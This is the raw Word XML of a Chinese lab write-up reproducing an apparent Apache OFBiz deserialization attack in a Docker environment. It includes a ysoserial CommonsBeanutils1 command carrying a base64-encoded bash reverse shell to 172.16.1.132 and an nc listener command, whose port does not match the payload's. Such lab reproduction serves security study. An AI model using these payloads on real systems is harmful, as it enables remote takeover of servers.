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01" w:rsidRPr="000E4817" w:rsidRDefault="000E4817">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E4817">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E4817" w:rsidRDefault="000E4817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0E4817" w:rsidRDefault="000E481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129588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817" w:rsidRDefault="000E4817">
                            <w:r w:rsidRPr="000E4817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0.2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1OnSENsAAAAHAQAADwAA&#10;AGRycy9kb3ducmV2LnhtbEyPQU+EMBCF7yb+h2ZMvLkFJGiQstkQvW6yuyZeZ2kFtJ0iLSz+e8eT&#10;Ht+8yXvfq7ars2IxUxg8KUg3CQhDrdcDdQpeTy93jyBCRNJoPRkF3ybAtr6+qrDU/kIHsxxjJziE&#10;QokK+hjHUsrQ9sZh2PjREHvvfnIYWU6d1BNeONxZmSVJIR0OxA09jqbpTft5nJ2C+dTslkOTfbwt&#10;e53vi2d0aL+Uur1Zd08golnj3zP84jM61Mx09jPpIKwCHhIVZEkOgt37h5SHnPmQpwXIupL/+esf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NTp0hDbAAAABwEAAA8AAAAAAAAAAAAA&#10;AAAAkAQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACYBQAAAAA=&#10;">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="000E4817" w:rsidRDefault="000E4817">
                      <w:r w:rsidRPr="000E4817">
                        <w:t>docker-compose up -d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817" w:rsidRDefault="000E4817"/>
    <w:p w:rsidR="000E4817" w:rsidRDefault="000E4817"/>
    <w:p w:rsidR="000E4817" w:rsidRDefault="000E4817">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、等待数分钟后，访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00CB4AD7" w:rsidRPr="00324179">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>h</w:t>
        </w:r>
        <w:r w:rsidR="00CB4AD7" w:rsidRPr="00324179">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>ttps://your-ip/myportal/control/main</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可看到登录页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E4817" w:rsidRPr="00CB4AD7" w:rsidRDefault="00CB4AD7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="637424EE" wp14:editId="0B02D6BB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17" w:rsidRDefault="000E4817">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000E4817" w:rsidRPr="000E4817" w:rsidRDefault="000E4817">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E4817">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E4817" w:rsidRDefault="000E4817">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、使用</w:t>
      </w:r>
      <w:r>
        <w:t>ysoserial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的Com</w:t>
      </w:r>
      <w:r>
        <w:t>monsBeanutil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生成</w:t>
      </w:r>
      <w:r w:rsidR="00CC1629">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹s</w:t>
      </w:r>
      <w:r w:rsidR="00CC1629">
        <w:t>hell</w:t>
      </w:r>
      <w:r w:rsidR="00CC1629">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pay</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E4817" w:rsidRDefault="00CC1629">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5251938" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="25400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9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629" w:rsidRDefault="00CC1629">
                            <w:r w:rsidRPr="00CC1629">
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                              <w:t>java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMzIvMjI1OSAwPiYx}|{base64,-d}|{bash,-i}" | base64 | tr -d "\n"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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00CC1629" w:rsidRDefault="00CC1629">
                      <w:r w:rsidRPr="00CC1629">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMzIvMjI1OSAwPiYx}|{base64,-d}|{bash,-i}" | base64 | tr -d "\n"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4817" w:rsidRDefault="000E4817">
      <w:r>
        <w:t>2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开启监听</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB4AD7" w:rsidRDefault="00CC162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629" w:rsidRDefault="00CC1629">
                            <w:r>
                              <w:t>nc –lvnp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wm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o+SnfQpobpDZi0M/Y3ziJsG&#10;7CdKOuztgrqPO2YFJeqlRnUW4+k0DEM0prOnSCWx557y3MM0R6iCekqG7drHAYq8mStUcSMjv0Hu&#10;IZNjytizkfbjfIWhOLdj1K+/wOon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BJwmwm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CC1629" w:rsidRDefault="00CC1629">
                      <w:r>
                        <w:t>nc –lvnp 8888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4817" w:rsidRDefault="000E4817">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、将base</w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后的Pay</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换并发送如下数据包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB4AD7" w:rsidRDefault="00CC16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FB6CD" wp14:editId="7973EF85">
            <wp:extent cx="5274310" cy="3983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17" w:rsidRDefault="000E4817">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4、V</w:t>
      </w:r>
      <w:r>
        <w:t>PS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功接收到s</w:t>
      </w:r>
      <w:r>
        <w:t>hell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB4AD7" w:rsidRDefault="00CC162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C87451A" wp14:editId="16A0FB4A">
            <wp:extent cx="5274310" cy="1127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6B" w:rsidRDefault="00D45E6B" w:rsidP="000E4817">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D45E6B" w:rsidRDefault="00D45E6B" w:rsidP="000E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6B" w:rsidRDefault="00D45E6B" w:rsidP="000E4817">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D45E6B" w:rsidRDefault="00D45E6B" w:rsidP="000E4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8F"/>
    <w:rsid w:val="000E4817"/>
    <w:rsid w:val="00594201"/>
    <w:rsid w:val="00A30B8F"/>
    <w:rsid w:val="00CB4AD7"/>
    <w:rsid w:val="00CC1629"/>
    <w:rsid w:val="00D4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F42BC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FBF355D2-CFEB-4BE6-AD27-D6C66F5A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817"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000E4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r-ip/myportal/control/ma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2022-05-28T12:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-28T14:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>